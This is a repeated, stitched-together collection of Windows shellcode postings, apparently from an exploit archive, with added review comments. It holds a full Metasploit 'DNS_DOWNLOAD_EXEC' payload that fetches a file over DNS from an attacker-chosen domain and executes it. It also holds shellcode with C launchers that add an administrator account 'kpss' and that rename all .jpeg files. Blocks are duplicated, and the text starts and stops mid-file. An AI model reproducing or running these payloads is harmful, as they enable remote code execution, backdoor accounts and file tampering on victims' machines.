'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
# 'Payload2' is the trailing fragment; the last two concatenated pieces
# contain the plain ASCII "/c \"" and "cmd " (presumably the command-line
# prefix used to run the written file) - another cleartext indicator.
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
# NOTE(review): the 9-byte DOMAIN maximum is only stated in the description;
# generate_stage does not enforce it.
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
# Splices the DOMAIN and FILE options into the fixed stub fragments:
#   Begin + "." + DOMAIN (padded to 10) + Payload1 + FILE (4 bytes) + Payload2
# and returns the raw payload String. Reads datastore['DOMAIN'] and
# datastore['FILE']; falls back to '' and 'vbs' when they are unset.
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
# Remember the real extension length before padding: only the original
# bytes are transformed below, the 0x01 padding bytes are left as they are.
extLen=extens.length
# Pad the extension to a fixed 4-byte field with 0x01.
while extens.length<4
extens=extens+"\x01"
end
i=0
# Each original extension byte is stored incremented by one (the stub is
# presumably expected to undo this at run time - TODO confirm against Payload1).
# NOTE(review): `[]=` mutates the String in place. When FILE is already 4+
# characters the padding loop never runs, so extens is still the datastore's
# own object and a second generate_stage call would presumably increment it
# again - verify. (`extens[i]` is a one-char String on Ruby 1.9+ and an
# Integer on 1.8; `.ord` is presumably used so both work.)
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
# Pad DOMAIN to 10 bytes with 0xFF, then prefix the 0x2e ('.') separator.
# NOTE(review): there is no upper-bound check, so a DOMAIN longer than 10
# bytes is spliced in unpadded and presumably breaks the fixed layout the
# stub expects; the option text says 9 bytes maximum, which is worth
# enforcing here rather than relying on the user.
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/NAT/Proxy bypass via reverse connection (like dnscat does, but without sockets, and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# does not work on XP/2003 because there is no IPv6 by default.
# can work on XP/2003 if IPv6 is installed
# (it does not need to be enabled, just installed)
require 'msf/core'
# Metasploit single payload: the stub fragments below are concatenated with
# the DOMAIN and FILE options by generate_stage into one raw byte string.
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
# Registers module metadata, the raw payload fragments and the two options
# (DOMAIN, FILE) that generate_stage reads from the datastore.
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
# 'Begin' embeds, as plain ASCII separated by 0xFF, the library and API
# names GetProcAddress, GetTempPathA, WinExec, ExitThread, LoadLibraryA,
# ws2_32, WSAStartup, getaddrinfo, msvcrt, fopen, fwrite and fclose
# (presumably resolved at run time). These cleartext names are the obvious
# static indicator for this payload.
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
# 'Payload1' follows the DOMAIN field and precedes the FILE field (see
# generate_stage); its contents are opaque machine code from this view.
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
# 'Payload2' is the trailing fragment; the last two concatenated pieces
# contain the plain ASCII "/c \"" and "cmd " (presumably the command-line
# prefix used to run the written file) - another cleartext indicator.
'Payload2' => "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18"
}
))
# We use rtlExitThread(0)
deregister_options('EXITFUNC')
# Register the domain and cmd options
# NOTE(review): the 9-byte DOMAIN maximum is only stated in the description;
# generate_stage does not enforce it.
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end
#
# Constructs the payload
#
# Splices the DOMAIN and FILE options into the fixed stub fragments:
#   Begin + "." + DOMAIN (padded to 10) + Payload1 + FILE (4 bytes) + Payload2
# and returns the raw payload String. Reads datastore['DOMAIN'] and
# datastore['FILE']; falls back to '' and 'vbs' when they are unset.
def generate_stage
domain = datastore['DOMAIN'] || ''
extens = datastore['FILE'] || 'vbs'
# \"x66\x79\x66\x01"
# Remember the real extension length before padding: only the original
# bytes are transformed below, the 0x01 padding bytes are left as they are.
extLen=extens.length
# Pad the extension to a fixed 4-byte field with 0x01.
while extens.length<4
extens=extens+"\x01"
end
i=0
# Each original extension byte is stored incremented by one (the stub is
# presumably expected to undo this at run time - TODO confirm against Payload1).
# NOTE(review): `[]=` mutates the String in place. When FILE is already 4+
# characters the padding loop never runs, so extens is still the datastore's
# own object and a second generate_stage call would presumably increment it
# again - verify. (`extens[i]` is a one-char String on Ruby 1.9+ and an
# Integer on 1.8; `.ord` is presumably used so both work.)
while i<extLen
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end
# Pad DOMAIN to 10 bytes with 0xFF, then prefix the 0x2e ('.') separator.
# NOTE(review): there is no upper-bound check, so a DOMAIN longer than 10
# bytes is spliced in unpadded and presumably breaks the fixed layout the
# stub expects; the option text says 9 bytes maximum, which is worth
# enforcing here rather than relying on the user.
while domain.length<10
domain=domain+"\xFF"
end
domain="\x2e"+domain
payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
return payload
end
end
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Demo launcher: places the sample bytes in an automatic (stack) array,
 * prints their count, then transfers control into the array.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * on a system with a non-executable stack (DEP/NX) the call is expected to
 * fault rather than run. Returns 0 only if the called code returns.
 */
int main(){
/*
 * Raw bytes. The tail (third line onward) is plain ASCII and decodes to the
 * command described in the Desc line above:
 *   cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss
 * That cleartext is the simplest static indicator for this sample.
 * NOTE(review): the two 0x7c8xxxxx immediates after \xbb presumably
 * hard-code absolute addresses of the build named on the "Tested on"
 * line, so the sample is tied to that exact build.
 */
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
/*
 * NOTE(review): strlen() returns size_t, so "%d" is a mismatched conversion
 * specifier ("%zu" is the correct one), and strlen() takes a char *, not an
 * unsigned char *. Left as in the original. The count is only right because
 * no 0x00 byte occurs inside the array (the literal's implicit NUL ends it).
 */
printf("Size = %d bytes\n", strlen(shellcode));
/* Jump into the byte buffer -- see the header comment. */
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Demo launcher: places the sample bytes in an automatic (stack) array,
 * prints their count, then transfers control into the array.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * on a system with a non-executable stack (DEP/NX) the call is expected to
 * fault rather than run. Returns 0 only if the called code returns.
 */
int main(){
/*
 * Raw bytes. The tail (third line onward) is plain ASCII and decodes to the
 * command described in the Desc line above:
 *   cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss
 * That cleartext is the simplest static indicator for this sample.
 * NOTE(review): the two 0x7c8xxxxx immediates after \xbb presumably
 * hard-code absolute addresses of the build named on the "Tested on"
 * line, so the sample is tied to that exact build.
 */
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
/*
 * NOTE(review): strlen() returns size_t, so "%d" is a mismatched conversion
 * specifier ("%zu" is the correct one), and strlen() takes a char *, not an
 * unsigned char *. Left as in the original. The count is only right because
 * no 0x00 byte occurs inside the array (the literal's implicit NUL ends it).
 */
printf("Size = %d bytes\n", strlen(shellcode));
/* Jump into the byte buffer -- see the header comment. */
((void (*)())shellcode)();
return 0;
}
Add Admin Shellcode 112 bytes
# Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Demo launcher: places the sample bytes in an automatic (stack) array,
 * prints their count, then transfers control into the array.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * on a system with a non-executable stack (DEP/NX) the call is expected to
 * fault rather than run. Returns 0 only if the called code returns.
 */
int main(){
/*
 * Raw bytes. The tail (third line onward) is plain ASCII and decodes to the
 * command described in the Desc line above:
 *   cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss
 * That cleartext is the simplest static indicator for this sample.
 * NOTE(review): the two 0x7c8xxxxx immediates after \xbb presumably
 * hard-code absolute addresses of the build named on the "Tested on"
 * line, so the sample is tied to that exact build.
 */
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
/*
 * NOTE(review): strlen() returns size_t, so "%d" is a mismatched conversion
 * specifier ("%zu" is the correct one), and strlen() takes a char *, not an
 * unsigned char *. Left as in the original. The count is only right because
 * no 0x00 byte occurs inside the array (the literal's implicit NUL ends it).
 */
printf("Size = %d bytes\n", strlen(shellcode));
/* Jump into the byte buffer -- see the header comment. */
((void (*)())shellcode)();
return 0;
}
# Author : KaHPeSeSe
# Screenshot : http://i53.tinypic.com/289yamq.jpg
# Desc. : usr: kpss , pass: 12345 , localgroup: Administrator
# Tested on : PERFECT XP PC1 / SP3
# Date : 18/07/2011
# Not : a.q kpss :((
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Demo launcher: places the sample bytes in an automatic (stack) array,
 * prints their count, then transfers control into the array.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * on a system with a non-executable stack (DEP/NX) the call is expected to
 * fault rather than run. Returns 0 only if the called code returns.
 */
int main(){
/*
 * Raw bytes. The tail (third line onward) is plain ASCII and decodes to the
 * command described in the Desc line above:
 *   cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss
 * That cleartext is the simplest static indicator for this sample.
 * NOTE(review): the two 0x7c8xxxxx immediates after \xbb presumably
 * hard-code absolute addresses of the build named on the "Tested on"
 * line, so the sample is tied to that exact build.
 */
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4e\x53\xbb\x0d\x25\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
"\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64"
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73";
/*
 * NOTE(review): strlen() returns size_t, so "%d" is a mismatched conversion
 * specifier ("%zu" is the correct one), and strlen() takes a char *, not an
 * unsigned char *. Left as in the original. The count is only right because
 * no 0x00 byte occurs inside the array (the literal's implicit NUL ends it).
 */
printf("Size = %d bytes\n", strlen(shellcode));
/* Jump into the byte buffer -- see the header comment. */
((void (*)())shellcode)();
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Sample bytes as a file-scope array. The tail is plain ASCII and decodes to
 *   cmd.exe REN *.jpeg *.vir
 * followed by a NUL -- the rename named in the title, and the simplest static
 * indicator for this sample.
 * NOTE(review): the two immediates after \xbb (\x39\xe7\x99\x75 and
 * \x6f\x2a\x96\x75) presumably hard-code absolute addresses of the build on
 * the "Tested on" line, so the sample only runs where those addresses match.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
/*
 * Demo launcher: transfers control into the file-scope `code` array and
 * only afterwards prints a message. argc/argv are unused.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * with non-executable data pages (DEP/NX) the call is expected to fault
 * rather than run.
 */
int main(int argc, char **argv)
{
((void (*)())code)();
/* Reached only if the called code returns to its caller; no trailing newline. */
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Sample bytes as a file-scope array. The tail is plain ASCII and decodes to
 *   cmd.exe REN *.jpeg *.vir
 * followed by a NUL -- the rename named in the title, and the simplest static
 * indicator for this sample.
 * NOTE(review): the two immediates after \xbb (\x39\xe7\x99\x75 and
 * \x6f\x2a\x96\x75) presumably hard-code absolute addresses of the build on
 * the "Tested on" line, so the sample only runs where those addresses match.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
/*
 * Demo launcher: transfers control into the file-scope `code` array and
 * only afterwards prints a message. argc/argv are unused.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * with non-executable data pages (DEP/NX) the call is expected to fault
 * rather than run.
 */
int main(int argc, char **argv)
{
((void (*)())code)();
/* Reached only if the called code returns to its caller; no trailing newline. */
printf("Renaming all .jpeg files to .vir files");
return 0;
}
Win32 / Windows7 Sp1 - rename .jpeg to .vir
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Sample bytes as a file-scope array. The tail is plain ASCII and decodes to
 *   cmd.exe REN *.jpeg *.vir
 * followed by a NUL -- the rename named in the title, and the simplest static
 * indicator for this sample.
 * NOTE(review): the two immediates after \xbb (\x39\xe7\x99\x75 and
